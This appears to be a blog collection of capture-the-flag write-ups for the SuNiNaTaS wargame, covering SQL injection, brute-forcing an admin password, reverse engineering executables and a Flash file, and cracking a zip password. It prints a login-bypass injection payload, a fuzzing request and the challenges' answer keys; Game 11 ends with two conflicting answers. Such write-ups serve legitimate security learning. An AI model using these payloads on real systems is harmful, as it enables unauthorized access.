Hello Navi

note and sharing

Posted on Edited on In Disqus: Word count in article: 93 Reading time ≈ 1 mins.

challenges

Game 06

Vulnerability: SQL Injection

Attack Vector

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

1
2
select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check by making the condition always true.

Success Response

1
2
3
4
Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

1
<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus

Posted on Edited on In Disqus: Word count in article: 22 Reading time ≈ 1 mins.

challenges

Game 07

ublock(browser addon) btw

refresh and click the botton

1
<input type="submit" value="YES" />
G0Od d@y

Posted on Edited on In Disqus: Word count in article: 116 Reading time ≈ 1 mins.

challenges

Game 08

Vulnerability: Brute Force

Hint: Login as 'admin' with password in range 0 ~ 9999

Tool: ZAProxy

Attack

Use fuzzing to brute force the password parameter from 0 to 9999.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST http://suninatas.com/challenge/web08/web08.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web08/web08.asp
Cookie: ASPSESSIONIDQSBTDCST=FNDPAPJCJDFBJAAENDCKDGDK
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=admin&pw=$$
l3ruteforce P@ssword

Posted on Edited on In Disqus: Word count in article: 151 Reading time ≈ 1 mins.

challenges

Game 09

Challenge: Reverse engineering a Windows executable

Step 1: Extract Archive

1
7z x SuNiNaTaS.zip

Step 2: Identify File

1
file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 3: Analyze with IDA

Run the executable in a virtual environment (Windows 10, VirtualBox).

The program displays an input box with two buttons.

Use IDA Pro and press Shift+F12 to view strings. Look for the "Congratulation!" message, then double-click to find cross-references.

Step 4: Find Password

From IDA disassembly:

1
2
3
4
5
6
7
8
9
10
CODE:00450388 ; ---------------------------------------------------------------------------
CODE:00450389                 align 4
CODE:0045038C _str_913465     _strings <0FFFFFFFFh, 6, '913465'>
CODE:0045038C                                         ; DATA XREF: _TForm1_Button1Click+1B↑o
CODE:0045039B                 align 4
CODE:0045039C ; const CHAR aSuninatas[]
CODE:0045039C aSuninatas      db 'SuNiNaTaS',0        ; DATA XREF: _TForm1_Button1Click+45↑o
CODE:004503A6                 align 4
CODE:004503A8 ; const CHAR aCongratulation[]
CODE:004503A8 aCongratulation db 'Congratulation!',0  ; DATA XREF: _TForm1_Button1Click+4A↑o

Posted on Edited on In Disqus: Word count in article: 147 Reading time ≈ 1 mins.

challenges

Game 10

Challenge: Reverse engineering a .NET Windows executable

Step 1: Extract and Identify

1
2
7z x reversing.zip
file reversing.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections

Step 2: Hex Analysis

From hex view, strings are readable in Unicode format:

1
2theT@P, Authkey: Did U use the Peid?, SuNiNaTaS, Try again!, explorer, http://suninatas.com, textBox1, button1, OK, label2, Made by 2theT0P, button2, QUIT, Form1, WindowsFormsApplication1, Properties, Resources

The program is based on WinForms.

Step 3: Decompile with dnSpyEx

Use dnSpyEx (run in Windows) and drag the file to decompile.

Decompiled Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// WindowsFormsApplication1.Form1
// Token: 0x06000003 RID: 3 RVA: 0x00002068 File Offset: 0x00000268
private void button1_Click(object sender, EventArgs e)
{
    string text = "2theT@P";
    string text2 = "Authkey : Did U use the Peid?";
    if (this.textBox1.Text == text)
    {
        MessageBox.Show(text2, "SuNiNaTaS");
        this.textBox1.Text = "";
        return;
    }
    MessageBox.Show("Try again!", "SuNiNaTaS");
    this.textBox1.Text = "";
}

Posted on Edited on In Disqus: Word count in article: 275 Reading time ≈ 1 mins.

challenges

Game 11

Challenge: Reverse engineering a Windows executable with string manipulation

Step 1: Identify File

1
file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 2: Extract Strings from Hex

From IDA disassembly, key strings:

1
2
3
4
5
6
CODE:0045041C  Congratulation!
CODE:00450434  Authkey :
CODE:004504B8  2abbe4b6
CODE:004504CC  44536ca0
CODE:004504E0  81aae922
CODE:004504F4  e32fa0de

Step 3: Analyze Form Creation

In _TForm1_FormCreate, these strings are assigned to variables at offsets:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
lea     eax, [ebx+300h]
mov     edx, offset _str_2abbe4b6.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+304h]
mov     edx, offset _str_44536ca0.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+308h]
mov     edx, offset _str_81aae922.Text
call    @System@@LStrAsg$qqrpvpxv

lea     eax, [ebx+30Ch]
mov     edx, offset _str_e32fa0de.Text
call    @System@@LStrAsg$qqrpvpxv

All strings are concatenated in order:

1
2
3
4
push    dword ptr [ebx+300h]
push    dword ptr [ebx+308h]
push    dword ptr [ebx+304h]
push    dword ptr [ebx+30Ch]

Result: 2abbe4b681aae92244536ca0e32fa0de

Alternative: Decompiled Code Analysis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __fastcall TForm1_Button1Click(int a1)
{
  System::__linkproc__ LStrAsg(a1 + 784, &str_2V[1]);
  System::__linkproc__ LStrAsg(a1 + 788, &str_XS[1]);
  System::__linkproc__ LStrAsg(a1 + 792, &str_B6[1]);
  System::__linkproc__ LStrAsg(a1 + 796, &str_H1[1]);
  System::__linkproc__ LStrAsg(a1 + 800, &str_0F[1]);

  System::__linkproc__ LStrCatN(
    a1 + 816,
    5,
    v2,
    *(_DWORD *)(a1 + 792),  // B6
    *(_DWORD *)(a1 + 796),  // H1
    *(_DWORD *)(a1 + 788),  // XS
    *(_DWORD *)(a1 + 800)); // 0F
}

The strings are rearranged in the concatenation. Check assembly for the actual order.

Assembly Order

1
2
3
4
5
6
7
push    dword ptr [ebx+310h] ; 2V
push    dword ptr [ebx+318h] ; B6
push    dword ptr [ebx+31Ch] ; H1
push    dword ptr [ebx+314h] ; XS
push    dword ptr [ebx+320h] ; 0F

; Password: 2VB6H1XS0F
2abbe4b681aae92244536ca0e32fa0de

Posted on Edited on In Disqus: Word count in article: 155 Reading time ≈ 1 mins.

challenges

Game 12

Challenge: Reverse engineering a Flash SWF file

Step 1: Scan QR Code

Access the admin panel at http://suninatas.com/admin/ and scan the QR code.

QR Data: 

1
MECARD:N:;TEL:;EMAIL:;NOTE:;URL:http://suninatas.com/admin/admlogin.asp;ADR:;

Step 2: Download SWF File

Navigate to the URL in the QR code and find the Flash embed:

1
<embed src="admlogin.swf">

Download the SWF file.

Step 3: Identify File

1
file admlogin.swf

Output: Macromedia Flash data (compressed), version 8

Step 4: Decompile with FFDec

Install FFDec (Free Flash Decompiler):

1
2
paru -Ss ffdec
# aur/ffdec 25.0.0-2 - Open Source Flash SWF decompiler and editor

Import the SWF file into FFDec and search for authentication logic.

Decompiled Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
on(release){
    function receipt()
    {
        if(flashid != "admin" or flashpw != "myadmin!@")
        {
            flashmessage = "Wrong ID or PW";
            play();
        }
        else
        {
            flashmessage = "Auth : Today is a Good day~~~";
            play();
        }
    }
    receipt();
}

Credentials: - ID: admin - Password: myadmin!@

Today is a Good day~~~

Posted on Edited on In Disqus: Word count in article: 257 Reading time ≈ 1 mins.

challenges

Game 13

Challenge: Forensics - Steganography in ZIP and images

Hint: The programmer's bad habit of backing up source code

Step 1: Find and Download ZIP

The hint suggests looking for a backup file:

1
http://suninatas.com/challenge/web13/web13.zip

Step 2: Extract ZIP File

The ZIP is password-protected. Try extracting:

1
7z x web13.zip

Output:

1
2
3
4
5
ERROR: Wrong password : whitehack1.jpg
ERROR: Wrong password : whitehack2.jpg
ERROR: Wrong password : whitehack3.jpg
ERROR: Wrong password : whitehack4.jpg
ERROR: Wrong password : 4ڸ.txt

Note: Set locale to Korean if needed. Use unar instead for automatic handling:

1
unar web13.zip

Output reveals: 압축비번은4자리정수 (The compression password is a 4-digit integer)

Step 3: Brute Force Password

Use John the Ripper with a 4-digit wordlist:

1
2
zip2john web13.zip > hash.txt
john hash.txt --wordlist=~/ctf/tool/dic/SecLists/Fuzzing/4-digits-0000-9999.txt

Result: 7642 is the password

Step 4: Extract Files

After extracting with password 7642:

1
unar web13.zip

Open the text file with encoding EUC-KR.

Content: Combine the four images to find the key.

Step 5: Extract Data from Images

Use hex dump to find hidden data in each image:

whitehack1.jpg:

1
xxd whitehack1.jpg | head -20

Contains: first key : 3nda192n

whitehack2.jpg:

1
xxd whitehack2.jpg | head -20

Contains: second key : 84ed1cae

whitehack3.jpg:

1
xxd whitehack3.jpg | head -20

Contains: third key: 8abg9295

whitehack4.jpg:

1
xxd whitehack4.jpg | head -20

Contains: fourth key : cf9eda4d

Step 6: Combine Keys

Concatenate all four keys in order:

3nda192n + 84ed1cae + 8abg9295 + cf9eda4d

3nda192n84ed1cae8abg9295cf9eda4d